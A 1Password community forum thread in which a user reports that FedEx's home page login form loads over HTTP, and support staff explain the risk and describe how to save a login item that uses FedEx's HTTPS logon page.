fedex.com login is not secure
This is not a specific issue with 1password.
I just discovered that the login pane on the home page of http://www.fedex.com is not using https so its not secure and your username and password will not be encrypted over the internet.
I tried to ask fedex why they did that, but getting to the dept at fedex that knows is too hard. None of the agents I talked to have a clue. As usual, they suggested I use Internet Explorer which on a Mac is not an option besides the fact, this is not browser dependent. But its on their boilerplate q/a sheet to ask.
It appears that on some other pages that allow for login, they do use https.
Since you are guys are in the business of security, do you understand why a company such as fedex is so clueless about this?
1Password Version: 1Password 5 Version 5.3.1 (531001)
Extension Version: Not Provided
OS Version: 10.10.4
Sync Type: Not Provided
Referrer: forum-search:fedex login is not secure
Comments
-
It appears that on some other pages that allow for login, they do use https.
Since you are guys are in the business of security, do you understand why a company such as fedex is so clueless about this?@ddokoto: Ouch. While it's impossible for any of us to say, my guess would be "inertia". Often large companies rely on legacy systems on the backend which simply don't integrate with anything from, well...the 21st century. It may be that they'd need to upgrade a large part of their infrastructure just to make what appears to be a minor change like this. Not that that makes it okay. :lol:
That said, there's nothing stopping you from using one of the secure pages as your Login URL. And it also never hurts to simply try changing the
http://tohttps://, as it will often work. HTTPS Everywhere can also automate this in your browser. I hope this helps! :)0 -
Hi @ddokoto,
It looks possibly like they're making the classic mistake of posting over HTTPS from an insecure page. For others reading Troy Hunt will explain why this is a bad idea in his article Your login form posts to HTTPS, but you blew it when you loaded it over HTTP.
Here is something you can do to obtain a better URL from which to create a Login item, at least I think it should.
- Visit http://www.fedex.com/ and select your desired country if need be.
- Select your desired default option in the I want to menu below where it asks for your password.
- Click the Login button. Yes, without having filled in any details.
- You will be sent to a page where the URL starts with
https://www.fedex.com/fcl/logon.doand then a number of parameters of which at least some are required to reach this page. - Enter your username and password here and use our How to manually save a Login guide to create your Login item.
- You'll want to rely on what we call open and fill. In other words you want 1Password to pass that URL to your browser or store it in a bookmark, whichever suits you better and use that from now on.
It isn't ideal but given FedEx aren't loading the standard login page over HTTPS it's at least an improvement for those, like yourself, that are security conscious. Hopefully going forward somebody realises their current approach is not a wise one. I've shut down at least one account upon discover of the use of HTTP for the login page and I made a point of telling that company why too.
0 -
That said, there's nothing stopping you from using one of the secure pages as your Login URL. And it also never hurts to simply try changing the http:// to https://, as it will often work.
been there, done that. This tip does not work on this page. It immediately reverts back to http. Going to the "empty login failure" page may be the only way I thought. I tried to add that URL to 1password before I posted my query, but my autologin attempt failed to that page. I haven't tried since.
Fedex does not appear to have a web support contact number or email. All you can call is customer service and of course the first question is "what is your tracking number?". I asked to be transferred to speak to an agent about an issue with the website and that appeared to be too complicated a request for the first agent to handle. I wonder if there is a third party site to discuss this issue in order to get (the giant) Fedex's attention. The direct method hit a brick wall. I sent email to abuse@fedex.com, but there's no response. My last attempt was to speaker@infosec.fedex.com found on a forum posting. Again - no response (or bounce).
0 -
Hi @ddokoto,
It might be worth trying to create a new Login item on that login failure page. I don't have an account to test with but I can get open and fill to open a new tab and everything looks good from the filling aspect - I think it should work.
Some sites seem to be more responsive than others. It's a shame they don't seem interested in improving their site :(
0 -
Here is the response from fedex...
On 8/25/15 7:54 AM, Kerre Cassidy wrote:
Hi,
>
Fedex.com home page is presented as http which can be confusing and aggravating to the security conscious user. However, the login form on this page does submit to an encrypted (HTTPS) page, so the credentials are securely transported in this login scenario. Additionally, https is presented explicitly when one clicks the login button from the fedex.com home page.
>
FedEx takes both the customer experience and information security seriously and utilizes many tools, processes and techniques to protect customer and company data.
>
Thank you for your message.
>
Kerre Cassidy
FedEx Information Security krcassidy@fedex.com0 -
Greetings @ddokoto,
Fedex.com home page is presented as http which can be confusing and aggravating to the security conscious user. However, the login form on this page does submit to an encrypted (HTTPS) page, so the credentials are securely transported in this login scenario. Additionally, https is presented explicitly when one clicks the login button from the fedex.com home page.
Here's how Your login form posts to HTTPS, but you blew it when you loaded it over HTTP starts...
User: “Hey mate, your website isn’t using SSL when I enter my password, what gives?!”
Owner: “Ah, but it posts to HTTPS so your password is secure! We take security seriously. Our measures are robust.” (and other random, unquantifiable claims)
They look scarily similar don't they. I remain resolute in my beliefs, they should either serve the home page over HTTPS or have a dedicated login page. I will confess, I'm probably not being completely objective if I say I prefer the latter as it means applications like ours are far more likely to have fewer issues filling if it's a simple, dedicated page. I also argue though that a simple dedicated makes it easier for the developer too.
Hopefully they one day see the light and understand that everybody has to be security conscious now and that if small changes by all the players can make it safer for everybody.
0
